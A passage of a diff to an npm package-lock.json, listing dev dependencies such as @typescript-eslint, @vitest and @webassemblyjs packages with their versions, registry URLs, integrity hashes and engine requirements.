"^2.1.0", + "dir-glob": "^3.0.1", + "fast-glob": "^3.2.9", + "ignore": "^5.2.0", + "merge2": "^1.4.1", + "slash": "^3.0.0" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/@typescript-eslint/type-utils/node_modules/minimatch": { + "version": "9.0.5", + "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-9.0.5.tgz", + "integrity": "sha512-G6T0ZX48xgozx7587koeX9Ys2NYy6Gmv//P89sEte9V9whIapMNF4idKxnW2QtCcLiTWlb/wfCabAtAFWhhBow==", + "dev": true, + "dependencies": { + "brace-expansion": "^2.0.1" + }, + "engines": { + "node": ">=16 || 14 >=14.17" + }, + "funding": { + "url": "https://github.com/sponsors/isaacs" + } + }, + "node_modules/@typescript-eslint/type-utils/node_modules/ms": { + "version": "2.1.2", + "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.2.tgz", + "integrity": "sha512-sGkPx+VjMtmA6MX27oA4FBFELFCZZ4S4XqeGOXCv68tT+jb3vk/RyaKWP0PTKyWtmLSM0b+adUTEvbs1PEaH2w==", + "dev": true + }, + "node_modules/@typescript-eslint/type-utils/node_modules/semver": { + "version": "7.6.3", + "resolved": "https://registry.npmjs.org/semver/-/semver-7.6.3.tgz", + "integrity": "sha512-oVekP1cKtI+CTDvHWYFUcMtsK/00wmAEfyqKfNdARm8u1wNVhSgaX7A8d4UuIlUI5e84iEwOhs7ZPYRmzU9U6A==", + "dev": true, + "bin": { + "semver": "bin/semver.js" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/@typescript-eslint/type-utils/node_modules/slash": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/slash/-/slash-3.0.0.tgz", + "integrity": "sha512-g9Q1haeby36OSStwb4ntCGGGaKsaVSjQ68fBxoQcutl5fS1vuY18H3wSt3jFyFtrkx+Kz0V1G85A4MyAdDMi2Q==", + "dev": true, + "engines": { + "node": ">=8" + } + }, + "node_modules/@typescript-eslint/types": { + "version": "6.21.0", + "resolved": "https://registry.npmjs.org/@typescript-eslint/types/-/types-6.21.0.tgz", + "integrity": "sha512-1kFmZ1rOm5epu9NZEZm1kckCDGj5UJEf7P1kliH4LKu/RkwpsfqqGmY2OOcUs18lSlQBKLDYBOGxRVtrMN5lpg==", + "dev": true, + "engines": { + "node": "^16.0.0 || >=18.0.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/typescript-eslint" + } + }, + "node_modules/@typescript-eslint/typescript-estree": { + "version": "6.21.0", + "resolved": "https://registry.npmjs.org/@typescript-eslint/typescript-estree/-/typescript-estree-6.21.0.tgz", + "integrity": "sha512-6npJTkZcO+y2/kr+z0hc4HwNfrrP4kNYh57ek7yCNlrBjWQ1Y0OS7jiZTkgumrvkX5HkEKXFZkkdFNkaW2wmUQ==", + "dev": true, + "dependencies": { + "@typescript-eslint/types": "6.21.0", + "@typescript-eslint/visitor-keys": "6.21.0", + "debug": "^4.3.4", + "globby": "^11.1.0", + "is-glob": "^4.0.3", + "minimatch": "9.0.3", + "semver": "^7.5.4", + "ts-api-utils": "^1.0.1" + }, + "engines": { + "node": "^16.0.0 || >=18.0.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/typescript-eslint" + }, + "peerDependenciesMeta": { + "typescript": { + "optional": true + } + } + }, + "node_modules/@typescript-eslint/typescript-estree/node_modules/array-union": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/array-union/-/array-union-2.1.0.tgz", + "integrity": "sha512-HGyxoOTYUyCM6stUe6EJgnd4EoewAI7zMdfqO+kGjnlZmBDz/cR5pf8r/cR4Wq60sL/p0IkcjUEEPwS3GFrIyw==", + "dev": true, + "engines": { + "node": ">=8" + } + }, + "node_modules/@typescript-eslint/typescript-estree/node_modules/brace-expansion": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-2.0.1.tgz", + "integrity": "sha512-XnAIvQ8eM+kC6aULx6wuQiwVsnzsi9d3WxzV3FpWTGA19F621kwdbsAcFKXgKUHZWsy+mY6iL1sHTxWEFCytDA==", + "dev": true, + "dependencies": { + "balanced-match": "^1.0.0" + } + }, + "node_modules/@typescript-eslint/typescript-estree/node_modules/debug": { + "version": "4.3.6", + "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.6.tgz", + "integrity": "sha512-O/09Bd4Z1fBrU4VzkhFqVgpPzaGbw6Sm9FEkBT1A/YBXQFGuuSxa1dN2nxgxS34JmKXqYx8CZAwEVoJFImUXIg==", + "dev": true, + "dependencies": { + "ms": "2.1.2" + }, + "engines": { + "node": ">=6.0" + }, + "peerDependenciesMeta": { + "supports-color": { + "optional": true + } + } + }, + "node_modules/@typescript-eslint/typescript-estree/node_modules/globby": { + "version": "11.1.0", + "resolved": "https://registry.npmjs.org/globby/-/globby-11.1.0.tgz", + "integrity": "sha512-jhIXaOzy1sb8IyocaruWSn1TjmnBVs8Ayhcy83rmxNJ8q2uWKCAj3CnJY+KpGSXCueAPc0i05kVvVKtP1t9S3g==", + "dev": true, + "dependencies": { + "array-union": "^2.1.0", + "dir-glob": "^3.0.1", + "fast-glob": "^3.2.9", + "ignore": "^5.2.0", + "merge2": "^1.4.1", + "slash": "^3.0.0" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/@typescript-eslint/typescript-estree/node_modules/minimatch": { + "version": "9.0.3", + "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-9.0.3.tgz", + "integrity": "sha512-RHiac9mvaRw0x3AYRgDC1CxAP7HTcNrrECeA8YYJeWnpo+2Q5CegtZjaotWTWxDG3UeGA1coE05iH1mPjT/2mg==", + "dev": true, + "dependencies": { + "brace-expansion": "^2.0.1" + }, + "engines": { + "node": ">=16 || 14 >=14.17" + }, + "funding": { + "url": "https://github.com/sponsors/isaacs" + } + }, + "node_modules/@typescript-eslint/typescript-estree/node_modules/ms": { + "version": "2.1.2", + "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.2.tgz", + "integrity": "sha512-sGkPx+VjMtmA6MX27oA4FBFELFCZZ4S4XqeGOXCv68tT+jb3vk/RyaKWP0PTKyWtmLSM0b+adUTEvbs1PEaH2w==", + "dev": true + }, + "node_modules/@typescript-eslint/typescript-estree/node_modules/semver": { + "version": "7.6.3", + "resolved": "https://registry.npmjs.org/semver/-/semver-7.6.3.tgz", + "integrity": "sha512-oVekP1cKtI+CTDvHWYFUcMtsK/00wmAEfyqKfNdARm8u1wNVhSgaX7A8d4UuIlUI5e84iEwOhs7ZPYRmzU9U6A==", + "dev": true, + "bin": { + "semver": "bin/semver.js" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/@typescript-eslint/typescript-estree/node_modules/slash": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/slash/-/slash-3.0.0.tgz", + "integrity": "sha512-g9Q1haeby36OSStwb4ntCGGGaKsaVSjQ68fBxoQcutl5fS1vuY18H3wSt3jFyFtrkx+Kz0V1G85A4MyAdDMi2Q==", + "dev": true, + "engines": { + "node": ">=8" + } + }, + "node_modules/@typescript-eslint/utils": { + "version": "8.0.1", + "resolved": "https://registry.npmjs.org/@typescript-eslint/utils/-/utils-8.0.1.tgz", + "integrity": "sha512-CBFR0G0sCt0+fzfnKaciu9IBsKvEKYwN9UZ+eeogK1fYHg4Qxk1yf/wLQkLXlq8wbU2dFlgAesxt8Gi76E8RTA==", + "dev": true, + "dependencies": { + "@eslint-community/eslint-utils": "^4.4.0", + "@typescript-eslint/scope-manager": "8.0.1", + "@typescript-eslint/types": "8.0.1", + "@typescript-eslint/typescript-estree": "8.0.1" + }, + "engines": { + "node": "^18.18.0 || ^20.9.0 || >=21.1.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/typescript-eslint" + }, + "peerDependencies": { + "eslint": "^8.57.0 || ^9.0.0" + } + }, + "node_modules/@typescript-eslint/utils/node_modules/@typescript-eslint/scope-manager": { + "version": "8.0.1", + "resolved": "https://registry.npmjs.org/@typescript-eslint/scope-manager/-/scope-manager-8.0.1.tgz", + "integrity": "sha512-NpixInP5dm7uukMiRyiHjRKkom5RIFA4dfiHvalanD2cF0CLUuQqxfg8PtEUo9yqJI2bBhF+pcSafqnG3UBnRQ==", + "dev": true, + "dependencies": { + "@typescript-eslint/types": "8.0.1", + "@typescript-eslint/visitor-keys": "8.0.1" + }, + "engines": { + "node": "^18.18.0 || ^20.9.0 || >=21.1.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/typescript-eslint" + } + }, + "node_modules/@typescript-eslint/utils/node_modules/@typescript-eslint/types": { + "version": "8.0.1", + "resolved": "https://registry.npmjs.org/@typescript-eslint/types/-/types-8.0.1.tgz", + "integrity": "sha512-PpqTVT3yCA/bIgJ12czBuE3iBlM3g4inRSC5J0QOdQFAn07TYrYEQBBKgXH1lQpglup+Zy6c1fxuwTk4MTNKIw==", + "dev": true, + "engines": { + "node": "^18.18.0 || ^20.9.0 || >=21.1.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/typescript-eslint" + } + }, + "node_modules/@typescript-eslint/utils/node_modules/@typescript-eslint/typescript-estree": { + "version": "8.0.1", + "resolved": "https://registry.npmjs.org/@typescript-eslint/typescript-estree/-/typescript-estree-8.0.1.tgz", + "integrity": "sha512-8V9hriRvZQXPWU3bbiUV4Epo7EvgM6RTs+sUmxp5G//dBGy402S7Fx0W0QkB2fb4obCF8SInoUzvTYtc3bkb5w==", + "dev": true, + "dependencies": { + "@typescript-eslint/types": "8.0.1", + "@typescript-eslint/visitor-keys": "8.0.1", + "debug": "^4.3.4", + "globby": "^11.1.0", + "is-glob": "^4.0.3", + "minimatch": "^9.0.4", + "semver": "^7.6.0", + "ts-api-utils": "^1.3.0" + }, + "engines": { + "node": "^18.18.0 || ^20.9.0 || >=21.1.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/typescript-eslint" + }, + "peerDependenciesMeta": { + "typescript": { + "optional": true + } + } + }, + "node_modules/@typescript-eslint/utils/node_modules/@typescript-eslint/visitor-keys": { + "version": "8.0.1", + "resolved": "https://registry.npmjs.org/@typescript-eslint/visitor-keys/-/visitor-keys-8.0.1.tgz", + "integrity": "sha512-W5E+o0UfUcK5EgchLZsyVWqARmsM7v54/qEq6PY3YI5arkgmCzHiuk0zKSJJbm71V0xdRna4BGomkCTXz2/LkQ==", + "dev": true, + "dependencies": { + "@typescript-eslint/types": "8.0.1", + "eslint-visitor-keys": "^3.4.3" + }, + "engines": { + "node": "^18.18.0 || ^20.9.0 || >=21.1.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/typescript-eslint" + } + }, + "node_modules/@typescript-eslint/utils/node_modules/array-union": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/array-union/-/array-union-2.1.0.tgz", + "integrity": "sha512-HGyxoOTYUyCM6stUe6EJgnd4EoewAI7zMdfqO+kGjnlZmBDz/cR5pf8r/cR4Wq60sL/p0IkcjUEEPwS3GFrIyw==", + "dev": true, + "engines": { + "node": ">=8" + } + }, + "node_modules/@typescript-eslint/utils/node_modules/brace-expansion": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-2.0.1.tgz", + "integrity": "sha512-XnAIvQ8eM+kC6aULx6wuQiwVsnzsi9d3WxzV3FpWTGA19F621kwdbsAcFKXgKUHZWsy+mY6iL1sHTxWEFCytDA==", + "dev": true, + "dependencies": { + "balanced-match": "^1.0.0" + } + }, + "node_modules/@typescript-eslint/utils/node_modules/debug": { + "version": "4.3.6", + "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.6.tgz", + "integrity": "sha512-O/09Bd4Z1fBrU4VzkhFqVgpPzaGbw6Sm9FEkBT1A/YBXQFGuuSxa1dN2nxgxS34JmKXqYx8CZAwEVoJFImUXIg==", + "dev": true, + "dependencies": { + "ms": "2.1.2" + }, + "engines": { + "node": ">=6.0" + }, + "peerDependenciesMeta": { + "supports-color": { + "optional": true + } + } + }, + "node_modules/@typescript-eslint/utils/node_modules/eslint-visitor-keys": { + "version": "3.4.3", + "resolved": "https://registry.npmjs.org/eslint-visitor-keys/-/eslint-visitor-keys-3.4.3.tgz", + "integrity": "sha512-wpc+LXeiyiisxPlEkUzU6svyS1frIO3Mgxj1fdy7Pm8Ygzguax2N3Fa/D/ag1WqbOprdI+uY6wMUl8/a2G+iag==", + "dev": true, + "engines": { + "node": "^12.22.0 || ^14.17.0 || >=16.0.0" + }, + "funding": { + "url": "https://opencollective.com/eslint" + } + }, + "node_modules/@typescript-eslint/utils/node_modules/globby": { + "version": "11.1.0", + "resolved": "https://registry.npmjs.org/globby/-/globby-11.1.0.tgz", + "integrity": "sha512-jhIXaOzy1sb8IyocaruWSn1TjmnBVs8Ayhcy83rmxNJ8q2uWKCAj3CnJY+KpGSXCueAPc0i05kVvVKtP1t9S3g==", + "dev": true, + "dependencies": { + "array-union": "^2.1.0", + "dir-glob": "^3.0.1", + "fast-glob": "^3.2.9", + "ignore": "^5.2.0", + "merge2": "^1.4.1", + "slash": "^3.0.0" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/@typescript-eslint/utils/node_modules/minimatch": { + "version": "9.0.5", + "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-9.0.5.tgz", + "integrity": "sha512-G6T0ZX48xgozx7587koeX9Ys2NYy6Gmv//P89sEte9V9whIapMNF4idKxnW2QtCcLiTWlb/wfCabAtAFWhhBow==", + "dev": true, + "dependencies": { + "brace-expansion": "^2.0.1" + }, + "engines": { + "node": ">=16 || 14 >=14.17" + }, + "funding": { + "url": "https://github.com/sponsors/isaacs" + } + }, + "node_modules/@typescript-eslint/utils/node_modules/ms": { + "version": "2.1.2", + "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.2.tgz", + "integrity": "sha512-sGkPx+VjMtmA6MX27oA4FBFELFCZZ4S4XqeGOXCv68tT+jb3vk/RyaKWP0PTKyWtmLSM0b+adUTEvbs1PEaH2w==", + "dev": true + }, + "node_modules/@typescript-eslint/utils/node_modules/semver": { + "version": "7.6.3", + "resolved": "https://registry.npmjs.org/semver/-/semver-7.6.3.tgz", + "integrity": "sha512-oVekP1cKtI+CTDvHWYFUcMtsK/00wmAEfyqKfNdARm8u1wNVhSgaX7A8d4UuIlUI5e84iEwOhs7ZPYRmzU9U6A==", + "dev": true, + "bin": { + "semver": "bin/semver.js" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/@typescript-eslint/utils/node_modules/slash": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/slash/-/slash-3.0.0.tgz", + "integrity": "sha512-g9Q1haeby36OSStwb4ntCGGGaKsaVSjQ68fBxoQcutl5fS1vuY18H3wSt3jFyFtrkx+Kz0V1G85A4MyAdDMi2Q==", + "dev": true, + "engines": { + "node": ">=8" + } + }, + "node_modules/@typescript-eslint/visitor-keys": { + "version": "6.21.0", + "resolved": "https://registry.npmjs.org/@typescript-eslint/visitor-keys/-/visitor-keys-6.21.0.tgz", + "integrity": "sha512-JJtkDduxLi9bivAB+cYOVMtbkqdPOhZ+ZI5LC47MIRrDV4Yn2o+ZnW10Nkmr28xRpSpdJ6Sm42Hjf2+REYXm0A==", + "dev": true, + "dependencies": { + "@typescript-eslint/types": "6.21.0", + "eslint-visitor-keys": "^3.4.1" + }, + "engines": { + "node": "^16.0.0 || >=18.0.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/typescript-eslint" + } + }, + "node_modules/@typescript-eslint/visitor-keys/node_modules/eslint-visitor-keys": { + "version": "3.4.3", + "resolved": "https://registry.npmjs.org/eslint-visitor-keys/-/eslint-visitor-keys-3.4.3.tgz", + "integrity": "sha512-wpc+LXeiyiisxPlEkUzU6svyS1frIO3Mgxj1fdy7Pm8Ygzguax2N3Fa/D/ag1WqbOprdI+uY6wMUl8/a2G+iag==", + "dev": true, + "engines": { + "node": "^12.22.0 || ^14.17.0 || >=16.0.0" + }, + "funding": { + "url": "https://opencollective.com/eslint" + } + }, + "node_modules/@ungap/structured-clone": { + "version": "1.2.0", + "resolved": "https://registry.npmjs.org/@ungap/structured-clone/-/structured-clone-1.2.0.tgz", + "integrity": "sha512-zuVdFrMJiuCDQUMCzQaD6KL28MjnqqN8XnAqiEq9PNm/hCPTSGfrXCOfwj1ow4LFb/tNymJPwsNbVePc1xFqrQ==" + }, + "node_modules/@vitest/expect": { + "version": "2.0.5", + "resolved": "https://registry.npmjs.org/@vitest/expect/-/expect-2.0.5.tgz", + "integrity": "sha512-yHZtwuP7JZivj65Gxoi8upUN2OzHTi3zVfjwdpu2WrvCZPLwsJ2Ey5ILIPccoW23dd/zQBlJ4/dhi7DWNyXCpA==", + "dev": true, + "license": "MIT", + "dependencies": { + "@vitest/spy": "2.0.5", + "@vitest/utils": "2.0.5", + "chai": "^5.1.1", + "tinyrainbow": "^1.2.0" + }, + "funding": { + "url": "https://opencollective.com/vitest" + } + }, + "node_modules/@vitest/expect/node_modules/@vitest/pretty-format": { + "version": "2.0.5", + "resolved": "https://registry.npmjs.org/@vitest/pretty-format/-/pretty-format-2.0.5.tgz", + "integrity": "sha512-h8k+1oWHfwTkyTkb9egzwNMfJAEx4veaPSnMeKbVSjp4euqGSbQlm5+6VHwTr7u4FJslVVsUG5nopCaAYdOmSQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "tinyrainbow": "^1.2.0" + }, + "funding": { + "url": "https://opencollective.com/vitest" + } + }, + "node_modules/@vitest/expect/node_modules/@vitest/utils": { + "version": "2.0.5", + "resolved": "https://registry.npmjs.org/@vitest/utils/-/utils-2.0.5.tgz", + "integrity": "sha512-d8HKbqIcya+GR67mkZbrzhS5kKhtp8dQLcmRZLGTscGVg7yImT82cIrhtn2L8+VujWcy6KZweApgNmPsTAO/UQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "@vitest/pretty-format": "2.0.5", + "estree-walker": "^3.0.3", + "loupe": "^3.1.1", + "tinyrainbow": "^1.2.0" + }, + "funding": { + "url": "https://opencollective.com/vitest" + } + }, + "node_modules/@vitest/expect/node_modules/assertion-error": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/assertion-error/-/assertion-error-2.0.1.tgz", + "integrity": "sha512-Izi8RQcffqCeNVgFigKli1ssklIbpHnCYc6AknXGYoB6grJqyeby7jv12JUQgmTAnIDnbck1uxksT4dzN3PWBA==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=12" + } + }, + "node_modules/@vitest/expect/node_modules/chai": { + "version": "5.2.0", + "resolved": "https://registry.npmjs.org/chai/-/chai-5.2.0.tgz", + "integrity": "sha512-mCuXncKXk5iCLhfhwTc0izo0gtEmpz5CtG2y8GiOINBlMVS6v8TMRc5TaLWKS6692m9+dVVfzgeVxR5UxWHTYw==", + "dev": true, + "license": "MIT", + "dependencies": { + "assertion-error": "^2.0.1", + "check-error": "^2.1.1", + "deep-eql": "^5.0.1", + "loupe": "^3.1.0", + "pathval": "^2.0.0" + }, + "engines": { + "node": ">=12" + } + }, + "node_modules/@vitest/expect/node_modules/check-error": { + "version": "2.1.1", + "resolved": "https://registry.npmjs.org/check-error/-/check-error-2.1.1.tgz", + "integrity": "sha512-OAlb+T7V4Op9OwdkjmguYRqncdlx5JiofwOAUkmTF+jNdHwzTaTs4sRAGpzLF3oOz5xAyDGrPgeIDFQmDOTiJw==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">= 16" + } + }, + "node_modules/@vitest/expect/node_modules/deep-eql": { + "version": "5.0.2", + "resolved": "https://registry.npmjs.org/deep-eql/-/deep-eql-5.0.2.tgz", + "integrity": "sha512-h5k/5U50IJJFpzfL6nO9jaaumfjO/f2NjK/oYB2Djzm4p9L+3T9qWpZqZ2hAbLPuuYq9wrU08WQyBTL5GbPk5Q==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=6" + } + }, + "node_modules/@vitest/expect/node_modules/loupe": { + "version": "3.1.3", + "resolved": "https://registry.npmjs.org/loupe/-/loupe-3.1.3.tgz", + "integrity": "sha512-kkIp7XSkP78ZxJEsSxW3712C6teJVoeHHwgo9zJ380de7IYyJ2ISlxojcH2pC5OFLewESmnRi/+XCDIEEVyoug==", + "dev": true, + "license": "MIT" + }, + "node_modules/@vitest/expect/node_modules/pathval": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/pathval/-/pathval-2.0.0.tgz", + "integrity": "sha512-vE7JKRyES09KiunauX7nd2Q9/L7lhok4smP9RZTDeD4MVs72Dp2qNFVz39Nz5a0FVEW0BJR6C0DYrq6unoziZA==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">= 14.16" + } + }, + "node_modules/@vitest/pretty-format": { + "version": "2.1.9", + "resolved": "https://registry.npmjs.org/@vitest/pretty-format/-/pretty-format-2.1.9.tgz", + "integrity": "sha512-KhRIdGV2U9HOUzxfiHmY8IFHTdqtOhIzCpd8WRdJiE7D/HUcZVD0EgQCVjm+Q9gkUXWgBvMmTtZgIG48wq7sOQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "tinyrainbow": "^1.2.0" + }, + "funding": { + "url": "https://opencollective.com/vitest" + } + }, + "node_modules/@vitest/spy": { + "version": "2.0.5", + "resolved": "https://registry.npmjs.org/@vitest/spy/-/spy-2.0.5.tgz", + "integrity": "sha512-c/jdthAhvJdpfVuaexSrnawxZz6pywlTPe84LUB2m/4t3rl2fTo9NFGBG4oWgaD+FTgDDV8hJ/nibT7IfH3JfA==", + "dev": true, + "license": "MIT", + "dependencies": { + "tinyspy": "^3.0.0" + }, + "funding": { + "url": "https://opencollective.com/vitest" + } + }, + "node_modules/@vitest/utils": { + "version": "2.1.9", + "resolved": "https://registry.npmjs.org/@vitest/utils/-/utils-2.1.9.tgz", + "integrity": "sha512-v0psaMSkNJ3A2NMrUEHFRzJtDPFn+/VWZ5WxImB21T9fjucJRmS7xCS3ppEnARb9y11OAzaD+P2Ps+b+BGX5iQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "@vitest/pretty-format": "2.1.9", + "loupe": "^3.1.2", + "tinyrainbow": "^1.2.0" + }, + "funding": { + "url": "https://opencollective.com/vitest" + } + }, + "node_modules/@vitest/utils/node_modules/loupe": { + "version": "3.1.3", + "resolved": "https://registry.npmjs.org/loupe/-/loupe-3.1.3.tgz", + "integrity": "sha512-kkIp7XSkP78ZxJEsSxW3712C6teJVoeHHwgo9zJ380de7IYyJ2ISlxojcH2pC5OFLewESmnRi/+XCDIEEVyoug==", + "dev": true, + "license": "MIT" + }, + "node_modules/@webassemblyjs/ast": { + "version": "1.14.1", + "resolved": "https://registry.npmjs.org/@webassemblyjs/ast/-/ast-1.14.1.tgz", + "integrity": "sha512-nuBEDgQfm1ccRp/8bCQrx1frohyufl4JlbMMZ4P1wpeOfDhF6FQkxZJ1b/e+PLwr6X1Nhw6OLme5usuBWYBvuQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "@webassemblyjs/helper-numbers": "1.13.2", + "@webassemblyjs/helper-wasm-bytecode": "1.13.2" + } + }, + "node_modules/@webassemblyjs/floating-point-hex-parser": { + "version": "1.13.2", + "resolved": "https://registry.npmjs.org/@webassemblyjs/floating-point-hex-parser/-/floating-point-hex-parser-1.13.2.tgz", + "integrity": "sha512-6oXyTOzbKxGH4steLbLNOu71Oj+C8Lg34n6CqRvqfS2O71BxY6ByfMDRhBytzknj9yGUPVJ1qIKhRlAwO1AovA==", + "dev": true, + "license": "MIT" + }, + "node_modules/@webassemblyjs/helper-api-error": { + "version": "1.13.2", + "resolved": "https://registry.npmjs.org/@webassemblyjs/helper-api-error/-/helper-api-error-1.13.2.tgz", + "integrity": "sha512-U56GMYxy4ZQCbDZd6JuvvNV/WFildOjsaWD3Tzzvmw/mas3cXzRJPMjP83JqEsgSbyrmaGjBfDtV7KDXV9UzFQ==", + "dev": true, + "license": "MIT" + }, + "node_modules/@webassemblyjs/helper-buffer": { + "version": "1.14.1", + "resolved": "https://registry.npmjs.org/@webassemblyjs/helper-buffer/-/helper-buffer-1.14.1.tgz", + "integrity": "sha512-jyH7wtcHiKssDtFPRB+iQdxlDf96m0E39yb0k5uJVhFGleZFoNw1c4aeIcVUPPbXUVJ94wwnMOAqUHyzoEPVMA==", + "dev": true, + "license": "MIT" + }, + "node_modules/@webassemblyjs/helper-numbers": { + "version": "1.13.2", + "resolved": "https://registry.npmjs.org/@webassemblyjs/helper-numbers/-/helper-numbers-1.13.2.tgz", + "integrity": "sha512-FE8aCmS5Q6eQYcV3gI35O4J789wlQA+7JrqTTpJqn5emA4U2hvwJmvFRC0HODS+3Ye6WioDklgd6scJ3+PLnEA==", + "dev": true, + "license": "MIT", + "dependencies": { + "@webassemblyjs/floating-point-hex-parser": "1.13.2", + "@webassemblyjs/helper-api-error": "1.13.2", + "@xtuc/long": "4.2.2" + } + }, + "node_modules/@webassemblyjs/helper-wasm-bytecode": { + "version": "1.13.2", + "resolved": "https://registry.npmjs.org/@webassemblyjs/helper-wasm-bytecode/-/helper-wasm-bytecode-1.13.2.tgz", + "integrity": "sha512-3QbLKy93F0EAIXLh0ogEVR6rOubA9AoZ+WRYhNbFyuB70j3dRdwH9g+qXhLAO0kiYGlg3TxDV+I4rQTr/YNXkA==", + "dev": true, + "license": "MIT" + }, + "node_modules/@webassemblyjs/helper-wasm-section": { + "version": "1.14.1", + "resolved": "https://registry.npmjs.org/@webassemblyjs/helper-wasm-section/-/helper-wasm-section-1.14.1.tgz", + "integrity": "sha512-ds5mXEqTJ6oxRoqjhWDU83OgzAYjwsCV8Lo/N+oRsNDmx/ZDpqalmrtgOMkHwxsG0iI//3BwWAErYRHtgn0dZw==", + "dev": true, + "license": "MIT", + "dependencies": { + "@webassemblyjs/ast": "1.14.1", + "@webassemblyjs/helper-buffer": "1.14.1", + "@webassemblyjs/helper-wasm-bytecode": "1.13.2", + "@webassemblyjs/wasm-gen": "1.14.1" + } + }, + "node_modules/@webassemblyjs/ieee754": { + "version": "1.13.2", + "resolved": "https://registry.npmjs.org/@webassemblyjs/ieee754/-/ieee754-1.13.2.tgz", + "integrity": "sha512-4LtOzh58S/5lX4ITKxnAK2USuNEvpdVV9AlgGQb8rJDHaLeHciwG4zlGr0j/SNWlr7x3vO1lDEsuePvtcDNCkw==", + "dev": true, + "license": "MIT", + "dependencies": { + "@xtuc/ieee754": "^1.2.0" + } + }, + "node_modules/@webassemblyjs/leb128": { + "version": "1.13.2", + "resolved": "https://registry.npmjs.org/@webassemblyjs/leb128/-/leb128-1.13.2.tgz", + "integrity": "sha512-Lde1oNoIdzVzdkNEAWZ1dZ5orIbff80YPdHx20mrHwHrVNNTjNr8E3xz9BdpcGqRQbAEa+fkrCb+fRFTl/6sQw==", + "dev": true, + "license": "Apache-2.0", + "dependencies": { + "@xtuc/long": "4.2.2" + } + }, + "node_modules/@webassemblyjs/utf8": { + "version": "1.13.2", + "resolved": "https://registry.npmjs.org/@webassemblyjs/utf8/-/utf8-1.13.2.tgz", + "integrity": "sha512-3NQWGjKTASY1xV5m7Hr0iPeXD9+RDobLll3T9d2AO+g3my8xy5peVyjSag4I50mR1bBSN/Ct12lo+R9tJk0NZQ==", + "dev": true, + "license": "MIT" + }, + "node_modules/@webassemblyjs/wasm-edit": { + "version": "1.14.1", + "resolved": "https://registry.npmjs.org/@webassemblyjs/wasm-edit/-/wasm-edit-1.14.1.tgz", + "integrity": "sha512-RNJUIQH/J8iA/1NzlE4N7KtyZNHi3w7at7hDjvRNm5rcUXa00z1vRz3glZoULfJ5mpvYhLybmVcwcjGrC1pRrQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "@webassemblyjs/ast": "1.14.1", + "@webassemblyjs/helper-buffer": "1.14.1", + "@webassemblyjs/helper-wasm-bytecode": "1.13.2", + "@webassemblyjs/helper-wasm-section": "1.14.1", + "@webassemblyjs/wasm-gen": "1.14.1", + "@webassemblyjs/wasm-opt": "1.14.1", + "@webassemblyjs/wasm-parser": "1.14.1", + "@webassemblyjs/wast-printer": "1.14.1" + } + }, + "node_modules/@webassemblyjs/wasm-gen": { + "version": "1.14.1", + "resolved": "https://registry.npmjs.org/@webassemblyjs/wasm-gen/-/wasm-gen-1.14.1.tgz", + "integrity": "sha512-AmomSIjP8ZbfGQhumkNvgC33AY7qtMCXnN6bL2u2Js4gVCg8fp735aEiMSBbDR7UQIj90n4wKAFUSEd0QN2Ukg==", + "dev": true, + "license": "MIT", + "dependencies": { + "@webassemblyjs/ast": "1.14.1", + "@webassemblyjs/helper-wasm-bytecode": "1.13.2", + "@webassemblyjs/ieee754": "1.13.2", + "@webassemblyjs/leb128": "1.13.2", + "@webassemblyjs/utf8": "1.13.2" + } + }, + "node_modules/@webassemblyjs/wasm-opt": { + "version": "1.14.1", + "resolved": "https://registry.npmjs.org/@webassemblyjs/wasm-opt/-/wasm-opt-1.14.1.tgz", + "integrity": "sha512-PTcKLUNvBqnY2U6E5bdOQcSM+oVP/PmrDY9NzowJjislEjwP/C4an2303MCVS2Mg9d3AJpIGdUFIQQWbPds0Sw==", + "dev": true, + "license": "MIT", + "dependencies": { + "@webassemblyjs/ast": "1.14.1", + "@webassemblyjs/helper-buffer": "1.14.1", + "@webassemblyjs/wasm-gen": "1.14.1", + "@webassemblyjs/wasm-parser": "1.14.1" + } + }, + "node_modules/@webassemblyjs/wasm-parser": { + "version": "1.14.1", + "resolved": "https://registry.npmjs.org/@webassemblyjs/wasm-parser/-/wasm-parser-1.14.1.tgz", + "integrity": 